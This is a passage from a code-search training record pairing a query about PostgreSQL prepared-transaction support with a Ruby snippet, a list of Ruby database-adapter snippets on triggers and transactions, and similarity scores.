"def enable_event_trigger(name, options = {})\n if options[:always] && options[:replica]\n raise ArgumentError.new(\"Cannot use :replica and :always together when enabling an event trigger.\")\n end\n\n sql = \"ALTER EVENT TRIGGER #{quote_generic(name)} ENABLE\"\n\n if options[:always]\n sql << ' ALWAYS'\n elsif options[:replica]\n sql << ' REPLICA'\n end\n\n execute \"#{sql};\"\n end",
"def preconditions\n ActiveRecord::VERSION::MAJOR >= 6 &&\n Helper.postgresql? &&\n primary_field? &&\n column.sql_type.to_s.match(TARGET_COLUMN_TYPE)\n end",
"def trigger? key=:any\n return @data.include? :down if key == :any\n @data[key] == :down\n end",
"def triggers\n @_triggers ||= Trigger\n .joins(:crud_action)\n .where(klass: item.class.name,\n crud_actions: { name: @transaction })\n end",
"def check_event_trigger_there(triggers)\n result = false\n return result\n end",
"def trigger_exists?(database, table)\n trigger_name = \"#{options(table)[:rep_prefix]}_#{table}\"\n session.send(database).replication_trigger_exists? trigger_name, table\n end",
"def switch_trigger_mode(database, table, exclude_rr_activity)\n options = session.configuration.options\n if session.send(database).replication_trigger_exists? \"#{options[:rep_prefix]}_#{table}\", table\n params = {\n :trigger_name => \"#{options[:rep_prefix]}_#{table}\",\n :table => table,\n :keys => session.send(database).primary_key_names(table),\n :log_table => \"#{options[:rep_prefix]}_pending_changes\",\n :activity_table => \"#{options[:rep_prefix]}_running_flags\",\n :key_sep => options[:key_sep],\n :exclude_rr_activity => exclude_rr_activity,\n }\n session.send(database).create_or_replace_replication_trigger_function(params)\n end\n end",
"def trigger\n @trigger ||= begin\n trigger = Scrutinize::Trigger.new\n\n # Trigger configured at top level\n keys = %w(methods method targets target)\n unless (@options.keys & keys).empty?\n trigger.add @options.select { |k,v| keys.include?(k) }\n end\n\n # Trigger configured under trigger key\n trigger.add @options['trigger'] if @options['trigger'].is_a?(Hash)\n\n # Triggers configured under triggers key\n if @options['triggers'].is_a? Array\n @options['triggers'].each { |t| trigger.add t }\n end\n\n trigger\n end\n end",
"def on_update_clause(action)\n on_delete_clause(action)\n end",
"def add_trigger_and_function(filename, trigger_tables, drop_function=false)\n build_query filename, 'triggers' do |seed, queries|\n queries[0] << %Q!BEGIN;\n CREATE OR REPLACE FUNCTION #{seed['name']}() RETURNS #{seed['function']['return']} AS $$\n BEGIN\n #{seed['function']['sql']}\n END;\n $$ LANGUAGE plpgsql;\n #{Array(trigger_tables).map do |table|\n \"CREATE TRIGGER #{seed['name']} #{seed['trigger']['event'].gsub('<TRIGGERTABLE>', table)} #{seed['trigger']['execute']} #{seed['name']}();\"\n end.join(\"\\n\")}\n COMMIT;!\n queries[1] << Array(trigger_tables).map { |table| \"DROP TRIGGER IF EXISTS #{seed['name']} ON #{table};\\n\" } << (drop_function ? \"DROP FUNCTION IF EXISTS #{seed['name']};\" : '')\n end\n end",
"def on_table?; @on_table; end",
"def add_trigger(condition, name=nil, &action)\n trigger = com.ardor3d.input.logical.InputTrigger.new(condition, &action)\n trigger.set_id(name) if name\n logical.registerTrigger(trigger)\n trigger\n end",
"def statement; end",
"def check_event_trigger_auto\n start if @trigger == 3\n end",
"def core_changed?\n qtype_name_changed? || option_set_id_changed? || constraint_changed?\n end",
"def core_changed?\n qtype_name_changed? || option_set_id_changed? || constraint_changed?\n end",
"def trigger param\r\n self.send \"trig_#{param[:type] || :edge}\".to_sym, param\r\n end",
"def add_function_update_timestamp(opts={})\n if has_function?(:update_timestamp)\n # if we have it, overwrite it if force is set\n if !opts[:force] \n return true \n end\n end\n func=%Q{\n BEGIN\n NEW.updated_at := now();\n RETURN NEW;\n END;\n }\n self.db.create_function :update_timestamp, func, :replace => true, :returns => 'trigger', :language => 'plpgsql'\n end",
"def remove_trigger(table_name, proc_name, options = {})\n\n end",
"def if_condition; end",
"def triggerType _args\n \"triggerType _args;\" \n end",
"def create_trigger(trigger, conditions = [], dampenings = [], _actions = [])\n full_trigger = {}\n full_trigger[:trigger] = trigger.to_h\n conds = []\n conditions.each { |c| conds.push(c.to_h) }\n full_trigger[:conditions] = conds\n damps = []\n dampenings.each { |d| damps.push(d.to_h) } unless dampenings.nil?\n full_trigger[:dampenings] = damps\n\n http_post 'triggers/trigger', full_trigger\n end",
"def triggers\n Triggers.all(connection)\n end",
"def triggered_by__potential_values(current_user = nil)\r\n TRIGGERED_BIES\r\nend",
"def trigger_quit(entered_name)\n entered_name.downcase == \"quit\" || entered_name.downcase == \"q\"\nend",
"def constraint_sql\n parameter_string = parameters.collect { |parameter_name| \"#{table.entity.attribute_by_name(parameter_name).sql.column_name}\" }.join(', ')\n function_call = \"#{self.qualified_function_name}(#{parameter_string}) = 1\"\n (self.or_conditions + [function_call]).join(' OR ')\n end",
"def after_commit(*); end",
"def aux_trigger?(id, energy)\n # can the coil be trigger from the given energy?\n energy.value >= @aux_trigger_energy[id]\n end",
"def on_change(*attributes, &block)\n on_update(*attributes.push([NotNil, NotNil]), &block)\n end",
"def trigger_function(type)\n case type\n when \"onClick\" then \"click\"\n when \"onChange\" then \"change\"\n when \"onFocus\" then \"focus\"\n when \"onFocusOut\" then \"blur\"\n else fail \"Undefined trigger function!\"\n end\n end",
"def supports_combining_alter_table_ops?\n true\n end",
"def field_changed? name\n send :\"#{name}_changed?\"\n end",
"def trigger(*names, &block)\n if block.nil?\n names.each do |name|\n convert_method_to_trigger(name)\n end\n else\n name = names.first\n define_trigger_action(*names, &block)\n define_trigger(name)\n store_trigger(name)\n end\n end",
"def trigger?\n !key.nil? && !key.name.nil?\n end",
"def signal\n @condition.signal\n true\n end",
"def signal\n @condition.signal\n true\n end",
"def supports_combining_alter_table_ops?\n false\n end",
"def __binding_condition__() @__binding_condition__ ||= LOCK.new_cond end",
"def child_condition; end",
"def triggers=(value)\n @triggers = value\n end",
"def trigger_for_index!(event_name, index, *passed_args)\n self.trigger_by_scope!(event_name, *passed_args) do |scope|\n # method_name, *args, block = scope\n method_name, args, block = split_scope(scope)\n\n result = case method_name\n when nil\n # no method name means the event was bound directly, we don't\n # want to trigger changed on the array its self.\n false\n when :[]\n # Extract the current index if its reactive\n arg_index = args[0].cur\n\n # TODO: we could handle negative indicies better\n arg_index == index.cur || arg_index < 0\n when :last\n index.cur == self.size-1\n when :first\n index.cur == 0\n when :size, :length\n # Size does not depend on the contents of the cells\n false\n else\n true\n end\n\n result = false if method_name == :reject\n\n result\n end\n end",
"def create_or_update_functions(db: EventSourcery::Postgres.config.event_store_database,\n function_name: EventSourcery::Postgres.config.write_events_function_name,\n events_table_name: EventSourcery::Postgres.config.events_table_name,\n aggregates_table_name: EventSourcery::Postgres.config.aggregates_table_name)\n db.run <<-SQL\ncreate or replace function #{function_name}(_aggregateId uuid,\n _eventTypes varchar[],\n _expectedVersion int,\n _bodies json[],\n _createdAtTimes timestamp without time zone[],\n _eventUUIDs uuid[],\n _correlationIds uuid[],\n _causationIds uuid[],\n _lockTable boolean) returns void as $$\ndeclare\ncurrentVersion int;\nbody json;\neventVersion int;\neventId text;\nindex int;\nnewVersion int;\nnumEvents int;\ncreatedAt timestamp without time zone;\nbegin\nnumEvents := array_length(_bodies, 1);\nselect version into currentVersion from #{aggregates_table_name} where aggregate_id = _aggregateId;\nif not found then\n -- when we have no existing version for this aggregate\n if _expectedVersion = 0 or _expectedVersion is null then\n -- set the version to 1 if expected version is null or 0\n insert into #{aggregates_table_name}(aggregate_id, version) values(_aggregateId, numEvents);\n currentVersion := 0;\n else\n raise 'Concurrency conflict. Current version: 0, expected version: %', _expectedVersion;\n end if;\nelse\n if _expectedVersion is null then\n -- automatically increment the version\n update #{aggregates_table_name} set version = version + numEvents where aggregate_id = _aggregateId returning version into newVersion;\n currentVersion := newVersion - numEvents;\n else\n -- increment the version if it's at our expected version\n update #{aggregates_table_name} set version = version + numEvents where aggregate_id = _aggregateId and version = _expectedVersion;\n if not found then\n -- version was not at expected_version, raise an error.\n -- currentVersion may not equal what it did in the database when the\n -- above update statement is executed (it may have been incremented by another\n -- process)\n raise 'Concurrency conflict. Last known current version: %, expected version: %', currentVersion, _expectedVersion;\n end if;\n end if;\nend if;\nindex := 1;\neventVersion := currentVersion + 1;\nif _lockTable then\n -- Ensure this transaction is the only one writing events to guarantee\n -- linear growth of sequence IDs.\n -- Any value that won't conflict with other advisory locks will work.\n -- The Postgres tracker currently obtains an advisory lock using it's\n -- integer row ID, so values 1 to the number of ESP's in the system would\n -- be taken if the tracker is running in the same database as your\n -- projections.\n perform pg_advisory_xact_lock(-1);\nend if;\nforeach body IN ARRAY(_bodies)\nloop\n if _createdAtTimes[index] is not null then\n createdAt := _createdAtTimes[index];\n else\n createdAt := now() at time zone 'utc';\n end if;\n\n insert into #{events_table_name}\n (uuid, aggregate_id, type, body, version, correlation_id, causation_id, created_at)\n values\n (\n _eventUUIDs[index],\n _aggregateId,\n _eventTypes[index],\n body,\n eventVersion,\n _correlationIds[index],\n _causationIds[index],\n createdAt\n )\n returning id into eventId;\n\n eventVersion := eventVersion + 1;\n index := index + 1;\nend loop;\nperform pg_notify('new_event', eventId);\nend;\n$$ language plpgsql;\nSQL\n end",
"def trigger_changed\n trigger(:position_changed , self )\n end",
"def cond=(_arg0); end",
"def cond=(_arg0); end",
"def cond=(_arg0); end"
] |
[
"0.6295187",
"0.6269034",
"0.6183004",
"0.6004594",
"0.5989614",
"0.59486556",
"0.58836603",
"0.5881881",
"0.58626014",
"0.5818532",
"0.5760473",
"0.56977266",
"0.5681853",
"0.56244934",
"0.56173915",
"0.5532288",
"0.55016947",
"0.5458493",
"0.5457816",
"0.5444176",
"0.5434759",
"0.54202104",
"0.54171866",
"0.54171866",
"0.54087085",
"0.5407802",
"0.5366377",
"0.53103137",
"0.5267984",
"0.52668786",
"0.5256893",
"0.5241712",
"0.5241712",
"0.52366465",
"0.52366465",
"0.52366465",
"0.5221638",
"0.5204111",
"0.51768506",
"0.51700354",
"0.51614153",
"0.51572055",
"0.5139394",
"0.5129916",
"0.5129154",
"0.51179177",
"0.51160353",
"0.5099704",
"0.5099704",
"0.5092791",
"0.5089902",
"0.5082192",
"0.5080119",
"0.5079834",
"0.5056199",
"0.505183",
"0.50505954",
"0.5037222",
"0.5033494",
"0.49914587",
"0.49879918",
"0.49872965",
"0.49818203",
"0.49610168",
"0.49299723",
"0.49007812",
"0.48994353",
"0.48941562",
"0.4893361",
"0.4893361",
"0.48905185",
"0.48888227",
"0.48859033",
"0.4868557",
"0.4856742",
"0.48432806",
"0.4834467",
"0.48176914",
"0.47959778",
"0.47936317",
"0.477622",
"0.4776143",
"0.4761153",
"0.47368026",
"0.47292054",
"0.47159985",
"0.47128794",
"0.4705554",
"0.4698165",
"0.4698165",
"0.46937862",
"0.46801925",
"0.46758687",
"0.4675491",
"0.4675159",
"0.46692994",
"0.46673414",
"0.46492487",
"0.46492487",
"0.46492487"
] |
0.62159413
|
2
|
PostgreSQL supports prepared transactions (twophase commit) if max_prepared_transactions is greater than 0.
|
def supports_prepared_transactions?
return @supports_prepared_transactions if defined?(@supports_prepared_transactions)
@supports_prepared_transactions = self['SHOW max_prepared_transactions'].get.to_i > 0
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def supports_prepared_transactions?\n false\n end",
"def on_prepare_transaction_commit(unit, transaction); end",
"def commit_transaction(conn, opts=OPTS)\n if (s = opts[:prepare]) && savepoint_level(conn) <= 1\n log_connection_execute(conn, \"PREPARE TRANSACTION #{literal(s)}\")\n else\n super\n end\n end",
"def allow_preparing_prepared_statements?\n false\n end",
"def test_transactions(table=\"test_monetdb_transactions\", columndefs=['col1 INT', 'col2 VARCHAR(255)'])\n test_create_table(table, columndefs)\n \n data = [1, 'aa'] \n values = \"\"\n \n data.each do |d| values += '\\'' + d.to_s + '\\'' + ',' end\n values = values.chop # remove last ',' character \n \n insert = \"INSERT INTO \" + table + \" VALUES \" + \" ( \" + values + \" )\"\n \n @db.query('START TRANSACTION')\n @db.auto_commit(flag=false) # if @db.auto_commit?\n @db.query(insert)\n\n @db.query(\"COMMIT\") \n \n res = @db.query('SELECT * FROM ' + table)\n rows_committed = res.fetch_all\n res.free\n \n # create a save point\n @db.save\n @db.query(\"SAVEPOINT #{@db.transactions} ;\")\n \n @db.query(insert)\n \n # rollback to savepoint\n @db.query(\"ROLLBACK TO SAVEPOINT #{@db.transactions};\")\n @db.release\n \n res = @db.query('SELECT * FROM ' + table)\n rows_rolled_back = res.fetch_all\n res.free\n \n assert_equal(rows_committed, rows_rolled_back)\n \n # restore autocommit for remaining tests\n @db.auto_commit(flag=true) \n end",
"def supports_savepoints_in_prepared_transactions?\n supports_prepared_transactions? && supports_savepoints?\n end",
"def transaction\n @pool.hold do |conn|\n @transactions ||= []\n if @transactions.include? Thread.current\n return yield(conn)\n end\n conn.execute(SQL_BEGIN)\n begin\n @transactions << Thread.current\n result = yield(conn)\n conn.execute(SQL_COMMIT)\n result\n rescue => e\n conn.execute(SQL_ROLLBACK)\n raise e unless Error::Rollback === e\n ensure\n @transactions.delete(Thread.current)\n end\n end\n end",
"def use_transactions; end",
"def use_transactions; end",
"def transaction\n @pool.hold do |conn|\n @transactions ||= []\n if @transactions.include? Thread.current\n return yield(conn)\n end\n log_info(SQL_BEGIN)\n conn.execute(SQL_BEGIN)\n begin\n @transactions << Thread.current\n yield(conn)\n rescue Exception => e\n log_info(SQL_ROLLBACK)\n conn.execute(SQL_ROLLBACK)\n raise e unless Error::Rollback === e\n ensure\n unless e\n log_info(SQL_COMMIT)\n conn.execute(SQL_COMMIT)\n end\n @transactions.delete(Thread.current)\n end\n end\n end",
"def prepared_statements\n false\n end",
"def on_prepare_commit(unit, aggregates, events); end",
"def commit_transaction_sql\n SQL_COMMIT\n end",
"def commit_transaction_sql\n SQL_COMMIT\n end",
"def initial_commit?; end",
"def initial_commit?; end",
"def transaction\n start_transaction!\n\n result = yield\n\n query 'COMMIT'\n\n result\n rescue\n query 'ROLLBACK'\n raise\n\n ensure\n end_transaction!\n end",
"def run_transaction(conn, op)\n retries = 0\n max_retries = 3\n while true\n retries += 1\n if retries == max_retries\n err = \"Transaction did not succeed after #{retries} retries\"\n raise err\n end\n\n begin\n op.call(conn)\n\n # If we reach this point, we were able to commit, so we break\n # from the retry loop.\n break\n\n rescue PG::TRSerializationFailure\n # This is a retry error, so we roll back the current\n # transaction and sleep for a bit before retrying. The\n # sleep time increases for each failed transaction.\n # conn.rollback\n puts \"EXECUTE SERIALIZATION_FAILURE BRANCH\"\n sleep_secs = (2**retries).floor\n puts \"Sleeping for #{sleep_secs} seconds\"\n sleep(sleep_secs)\n next\n end\n end\nend",
"def transaction_with_timeout\n db.transaction do\n begin\n db.run(\"SET statement_timeout TO #{statement_timeout}\") if statement_timeout\n yield db\n db.run('SET statement_timeout TO DEFAULT')\n end\n end\n end",
"def transaction(&block)\n yield\n commit\n end",
"def statements_prepared(conn)\n @statement_mutex.synchronize do\n @statements_prepared ||= {}\n @statements_prepared[conn] ||= {}\n end\n end",
"def begin_transaction_sql\n SQL_BEGIN\n end",
"def begin_transaction_sql\n SQL_BEGIN\n end",
"def within_transaction; end",
"def within_transaction; end",
"def checked_transaction(opts=OPTS)\n use_transaction?(opts) ? db.transaction({:server=>this_server}.merge!(opts)){yield} : yield\n end",
"def checked_transaction(opts=OPTS)\n use_transaction?(opts) ? db.transaction({:server=>this_server}.merge!(opts)){yield} : yield\n end",
"def begin_db_transaction\n execute(\"BEGIN\")\n end",
"def begin_db_transaction\n execute(\"BEGIN\")\n end",
"def begin_db_transaction\n # PG driver doesn't really do anything on setAutoCommit(false)\n # except for commit-ing a previous pending transaction if any\n log('/* BEGIN */') { @connection.begin }\n end",
"def transaction(&block); end",
"def begin_db_transaction() end",
"def begin_db_transaction() end",
"def transaction\n start\n yield self\n rescue Object => ex\n rollback\n debug \"#{ex.class}: #{ex.message}\"\n ex.backtrace.each { |line| debug line }\n else\n commit\n end",
"def with_optional_transaction(bool, &block)\n bool ? transaction { yield } : yield\n end",
"def commit_db_transaction() end",
"def commit_db_transaction() end",
"def transaction(start_db_transaction=true)\n yield\n end",
"def begin_db_transaction\n @connection.autocommit = false\n end",
"def commit_required?; end",
"def test_commit_empty()\n t = Scalaroid::Transaction.new()\n t.commit()\n t.close_connection()\n end",
"def testCommit_Empty()\n t = Scalaris::Transaction.new()\n t.commit()\n t.close_connection()\n end",
"def testCommit_Empty()\n t = Scalaris::Transaction.new()\n t.commit()\n t.close_connection()\n end",
"def transaction; end",
"def transaction; end",
"def transaction; end",
"def transaction(&block)\n @in_transaction += 1\n begin\n yield self\n self.commit if @in_transaction > 0\n rescue => e\n self.rollback\n raise e\n ensure\n @in_transaction -= 1 unless @in_transaction == 0\n end\n end",
"def in_transaction(opts = {})\n yield\n end",
"def restart_transaction\n ActiveRecord::Base.connection.execute(\"COMMIT\")\n ActiveRecord::Base.connection.execute(\"BEGIN\")\n end",
"def transaction( &block )\n connect do | conn |\n conn.transaction do | conn |\n yield SqlRunner.new(SingleConnectionPool.new( conn ))\n end\n end\n end",
"def with_transaction\n ActiveRecord::Base.transaction { yield }\n end",
"def execute_prepared_statement(conn, name, opts=OPTS, &block)\n ps = prepared_statement(name)\n sql = ps.prepared_sql\n ps_name = name.to_s\n\n if args = opts[:arguments]\n args = args.map{|arg| bound_variable_arg(arg, conn)}\n end\n\n unless conn.prepared_statements[ps_name] == sql\n conn.execute(\"DEALLOCATE #{ps_name}\") if conn.prepared_statements.include?(ps_name)\n conn.check_disconnect_errors{log_connection_yield(\"PREPARE #{ps_name} AS #{sql}\", conn){conn.prepare(ps_name, sql)}}\n conn.prepared_statements[ps_name] = sql\n end\n\n log_sql = \"EXECUTE #{ps_name}\"\n if ps.log_sql\n log_sql += \" (\"\n log_sql << sql\n log_sql << \")\"\n end\n\n q = conn.check_disconnect_errors{log_connection_yield(log_sql, conn, args){_execute_prepared_statement(conn, ps_name, args, opts)}}\n begin\n block_given? ? yield(q) : q.cmd_tuples\n ensure\n q.clear if q && q.respond_to?(:clear)\n end\n end",
"def transaction\n raise Mysql2::Error, 2002 if @my.nil?\n\n if block_given?\n begin\n @my.query('START TRANSACTION WITH CONSISTENT SNAPSHOT')\n yield # Start executing the query black.\n @my.query('COMMIT')\n rescue Mysql2::Error => e\n @my.query('ROLLBACK')\n raise e\n end\n end\n end",
"def commit_db_transaction\n execute(\"COMMIT\")\n end",
"def commit_db_transaction\n execute(\"COMMIT\")\n end",
"def supports_transaction_isolation?\n true\n end",
"def transaction\n raise Mysql::Error, 'Not Connected' if @my.nil?\n\n if block_given?\n begin\n @my.query('START TRANSACTION WITH CONSISTENT SNAPSHOT')\n yield # Start executing the query black.\n @my.query('COMMIT')\n rescue Mysql::Error => e\n @my.query('ROLLBACK')\n raise e\n end\n end\n end",
"def transaction(opts = {})\n commit, rollback = start_transaction! opts\n tx_depth = nil\n begin\n if Pacer.verbose == :very\n tx_depth = threadlocal_graph_info[:dx_depth]\n puts \"--#{self.class.name} transaction #{ tx_depth } --> \"\n puts caller[0,3]\n end\n r = yield commit, rollback\n commit.call(false)\n r\n rescue Exception => e\n rollback.call e.message\n raise\n ensure\n puts \"--#{self.class.name} #{ tx_depth } <-- \" if Pacer.verbose == :very\n finish_transaction!\n end\n end",
"def supports_ddl_transactions?\n false\n end",
"def supports_ddl_transactions?\n false\n end",
"def supports_ddl_transactions?\n false\n end",
"def prepared_statement(name)\n Sequel.synchronize{prepared_statements[name]}\n end",
"def commit_transaction(conn)\n log_connection_execute(conn, commit_transaction_sql) unless Thread.current[:sequel_transaction_depth] > 1\n end",
"def begin_transaction(conn, opts={})\n log_yield(TRANSACTION_BEGIN){conn.setAutoCommit(false)}\n conn\n end",
"def prepare!\n prepare_once\n @total_rows_number = postgres.execute(\"SELECT COUNT('id') FROM #{data_table_name} WHERE #{data_where_scope}\")[0][0].to_i\n @iteration_number = 0\n @finished = false\n @prepared = true\n end",
"def _execute_prepared_statement(conn, ps_name, args, opts)\n conn.exec_prepared(ps_name, args)\n end",
"def within_transaction\n if use_transaction\n first.within_transaction do\n yield\n success?\n end\n else\n yield\n end\n end",
"def autocommit?()\n #This is a stub, used for indexing\n end",
"def prepare(*)\n raise Error, \"cannot prepare an already prepared statement\" unless allow_preparing_prepared_statements?\n super\n end",
"def begin_new_transaction(conn, opts)\n super\n if opts.has_key?(:synchronous)\n case sync = opts[:synchronous]\n when true\n sync = :on\n when false\n sync = :off\n when nil\n return\n end\n\n log_connection_execute(conn, \"SET LOCAL synchronous_commit = #{sync}\")\n end\n end",
"def execute_prepared_statement(ps_name, opts)\n args = opts[:arguments]\n ps = prepared_statement(ps_name)\n sql = ps.prepared_sql\n synchronize(opts[:server]) do |conn|\n unless conn.prepared_statements.fetch(ps_name, []).first == sql\n log_connection_yield(\"PREPARE #{ps_name}: #{sql}\", conn){conn.prepare(sql, ps_name)}\n end\n args = args.map{|v| v.nil? ? nil : prepared_statement_arg(v)}\n log_sql = \"EXECUTE #{ps_name}\"\n if ps.log_sql\n log_sql += \" (\"\n log_sql << sql\n log_sql << \")\"\n end\n begin\n stmt = log_connection_yield(log_sql, conn, args){conn.execute_prepared(ps_name, *args)}\n if block_given?\n yield(stmt)\n else \n stmt.affected\n end\n ensure\n stmt.free_result if stmt\n end\n end\n end",
"def commit_transaction(conn, opts=OPTS)\n if in_savepoint?(conn)\n if supports_releasing_savepoints?\n log_connection_yield('Transaction.release_savepoint', conn){conn.release_savepoint(savepoint_obj(conn))}\n end\n else\n log_connection_yield('Transaction.commit', conn){conn.commit}\n end\n end",
"def rollback_db_transaction() end",
"def rollback_db_transaction() end",
"def within_transaction\n if use_transactions && !empty?\n first.within_transaction do\n yield\n success?\n end\n else\n yield\n end\n end",
"def supports_transactional_ddl?\n true\n end",
"def lint_transaction_support\n result = gateway_instance.transaction { 1 }\n\n complain \"#{gateway_instance} must return the result of a transaction block\" if result != 1\n\n gateway_instance.transaction do |t|\n t.rollback!\n\n complain \"#{gateway_instance} must interrupt a transaction on rollback\"\n end\n end",
"def auto_commit?\n\t\t@connection.auto_commit?\n\tend",
"def commit( transaction )\n fail NotImplementedError\n end",
"def supports_transactional_ddl?\n false\n end",
"def begin_db_transaction\n @transaction = @connection.transaction('READ COMMITTED')\n end",
"def supports_transaction_isolation?\n false\n end",
"def supports_transaction_isolation?\n false\n end",
"def with_connection\n ActiveRecord::Base.connection_pool.with_connection do |connection|\n connection.transaction do\n if connection.adapter_name == \"PostgreSQL\"\n connection.execute \"SET TRANSACTION READ ONLY\"\n connection.execute \"SET LOCAL statement_timeout = 100\"\n # TODO support equivalent options for other adapters (such as mysql)\n end\n\n yield connection\n end\n end\n end",
"def transaction(options={}, &block)\n connection.transaction(options.update(:requires_new => true), &block)\n end",
"def transaction\n use do |connection|\n connection.transaction do |conn|\n begin\n yield conn\n rescue Rollback\n return\n end\n end\n end\n end",
"def commit_transaction(conn, opts={})\n log_yield(TRANSACTION_COMMIT){conn.commit}\n end",
"def transaction\n start_transaction\n\n yield\n ensure\n end_transaction if transaction_started?\n end",
"def begin_transaction\n return System.begin_transaction\n end",
"def transaction(&block)\n yield\n end",
"def transaction(&block)\n yield\n end",
"def transaction(opts={:auto_enable => false})\n @transaction_level||=0\n @transaction_level+=1\n session do\n raise_if_transaction_running\n @transaction ||= true\n raise Error.cannot_obtain_transaction_lock if not lock_transaction\n begin\n yield\n # get_transaction in case cfgsave or cfgenable was run in transaction block\n # if there is no transaction we do not need to run it\n # if there is transaction but opend by someone else then t\n cfg_save if @transaction_level==1 && get_transaction\n rescue => e\n abort_transaction\n raise e\n end \n end\n ensure\n @transaction_level-=1\n @transaction = nil if @transaction_level==0\n end",
"def begin_transaction(conn, opts=OPTS)\n if in_savepoint?(conn)\n _trans(conn)[:savepoints][-1][:obj] = log_connection_yield('Transaction.savepoint', conn){conn.set_savepoint}\n else\n log_connection_yield('Transaction.begin', conn){conn.setAutoCommit(false)}\n set_transaction_isolation(conn, opts)\n end\n end",
"def start_transaction!\n fail DbMod::Exceptions::AlreadyInTransaction if @in_transaction\n @in_transaction = true\n\n query 'BEGIN'\n end",
"def TransactionBegin()\n\t@dbh.do(\"BEGIN\")\nend",
"def auto_commit?\n @connection.auto_commit?\n end",
"def remove_transaction(conn, committed)\n conn.autocommit = true\n ensure\n super\n end",
"def locked_transaction(&block)\n unless connection.open_transactions.zero?\n raise \"locked_transaction cannot be called from within another transaction!\"\n end\n unsafe_locked_transaction do\n yield if block_given?\n end\n end",
"def execute_prepared_statement(name, args)\n check_disconnect_errors{exec_prepared(name, args)}\n end",
"def begin\n db.transaction do\n yield\n end\n end"
] |
[
"0.7779416",
"0.67318296",
"0.66393447",
"0.6488887",
"0.64478713",
"0.642692",
"0.62858105",
"0.6274448",
"0.6274448",
"0.62604916",
"0.6229228",
"0.6184096",
"0.6167285",
"0.6167285",
"0.61652166",
"0.61652166",
"0.60421",
"0.59701645",
"0.5968591",
"0.59547496",
"0.592801",
"0.5924486",
"0.5924486",
"0.59016067",
"0.59016067",
"0.5891991",
"0.5891991",
"0.587547",
"0.587547",
"0.587391",
"0.58325875",
"0.57965916",
"0.57965916",
"0.57919526",
"0.57857233",
"0.57477444",
"0.57477444",
"0.57421106",
"0.57363385",
"0.57304704",
"0.5729876",
"0.57084495",
"0.57084495",
"0.5697033",
"0.5697033",
"0.5697033",
"0.5694134",
"0.56853026",
"0.5677191",
"0.5676279",
"0.5673022",
"0.5663831",
"0.56530476",
"0.5634543",
"0.5634543",
"0.5628902",
"0.5623996",
"0.56233305",
"0.5623172",
"0.5623172",
"0.5623172",
"0.561547",
"0.56124806",
"0.5609747",
"0.5589336",
"0.55842215",
"0.55837697",
"0.55824804",
"0.5579749",
"0.557821",
"0.55689186",
"0.55500233",
"0.55407214",
"0.55407214",
"0.5539981",
"0.55376256",
"0.5536491",
"0.5527239",
"0.5509658",
"0.55059713",
"0.55016106",
"0.5494956",
"0.5494956",
"0.5485136",
"0.548384",
"0.5474253",
"0.5473428",
"0.54596865",
"0.5452422",
"0.5451877",
"0.5451877",
"0.5449678",
"0.5440156",
"0.5429976",
"0.54296666",
"0.54266626",
"0.54245657",
"0.5421951",
"0.54215723",
"0.5411578"
] |
0.7233213
|
1
|
PostgreSQL supports transaction isolation levels
|
def supports_transaction_isolation_levels?
true
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def supports_transaction_isolation?\n true\n end",
"def supports_transaction_isolation_levels?\n true\n end",
"def run_in_transaction isolation\n if isolation\n Base.transaction isolation: isolation do\n yield\n end\n else\n yield\n end\n end",
"def run_in_transaction isolation\n if isolation\n Base.transaction isolation: isolation do\n yield\n end\n else\n yield\n end\n end",
"def supports_transaction_isolation_levels?\n false\n end",
"def transaction\n @pool.hold do |conn|\n @transactions ||= []\n if @transactions.include? Thread.current\n return yield(conn)\n end\n conn.execute(SQL_BEGIN)\n begin\n @transactions << Thread.current\n result = yield(conn)\n conn.execute(SQL_COMMIT)\n result\n rescue => e\n conn.execute(SQL_ROLLBACK)\n raise e unless Error::Rollback === e\n ensure\n @transactions.delete(Thread.current)\n end\n end\n end",
"def supports_transaction_isolation?\n false\n end",
"def supports_transaction_isolation?\n false\n end",
"def within_transaction; end",
"def within_transaction; end",
"def transaction\n @pool.hold do |conn|\n @transactions ||= []\n if @transactions.include? Thread.current\n return yield(conn)\n end\n log_info(SQL_BEGIN)\n conn.execute(SQL_BEGIN)\n begin\n @transactions << Thread.current\n yield(conn)\n rescue Exception => e\n log_info(SQL_ROLLBACK)\n conn.execute(SQL_ROLLBACK)\n raise e unless Error::Rollback === e\n ensure\n unless e\n log_info(SQL_COMMIT)\n conn.execute(SQL_COMMIT)\n end\n @transactions.delete(Thread.current)\n end\n end\n end",
"def transaction_isolation_levels\n {\n read_committed: 'READ COMMITTED',\n repeatable_read: 'REPEATABLE READ',\n serializable: 'SERIALIZABLE'\n }\n end",
"def test_supports_transaction_isolation\n assert ActiveRecord::Base.connection.supports_transaction_isolation?\n\n assert ActiveRecord::Base.connection.supports_transaction_isolation_level?(:read_uncommitted)\n assert ActiveRecord::Base.connection.supports_transaction_isolation_level?(:read_committed)\n assert ActiveRecord::Base.connection.supports_transaction_isolation_level?(:repeatable_read)\n assert ActiveRecord::Base.connection.supports_transaction_isolation_level?(:serializable)\n end",
"def with_transaction\n ActiveRecord::Base.transaction { yield }\n end",
"def begin_isolated_db_transaction(isolation)\n @connection.transaction transaction_isolation_levels.fetch(isolation, isolation)\n end",
"def supports_transaction_isolation_levels?\n synchronize{|conn| conn.getMetaData.supportsTransactionIsolationLevel(JavaSQL::Connection::TRANSACTION_SERIALIZABLE)}\n end",
"def transaction; end",
"def transaction; end",
"def transaction; end",
"def use_transactions; end",
"def use_transactions; end",
"def begin_isolated_db_transaction(isolation)\n name = isolation.to_s.upcase; name.sub!('_', ' ')\n log(\"/* BEGIN */; SET TRANSACTION ISOLATION LEVEL #{name}\") do\n @connection.begin(isolation)\n end\n end",
"def transaction\n start_transaction!\n\n result = yield\n\n query 'COMMIT'\n\n result\n rescue\n query 'ROLLBACK'\n raise\n\n ensure\n end_transaction!\n end",
"def transaction\n raise Mysql2::Error, 2002 if @my.nil?\n\n if block_given?\n begin\n @my.query('START TRANSACTION WITH CONSISTENT SNAPSHOT')\n yield # Start executing the query black.\n @my.query('COMMIT')\n rescue Mysql2::Error => e\n @my.query('ROLLBACK')\n raise e\n end\n end\n end",
"def begin_db_transaction() end",
"def begin_db_transaction() end",
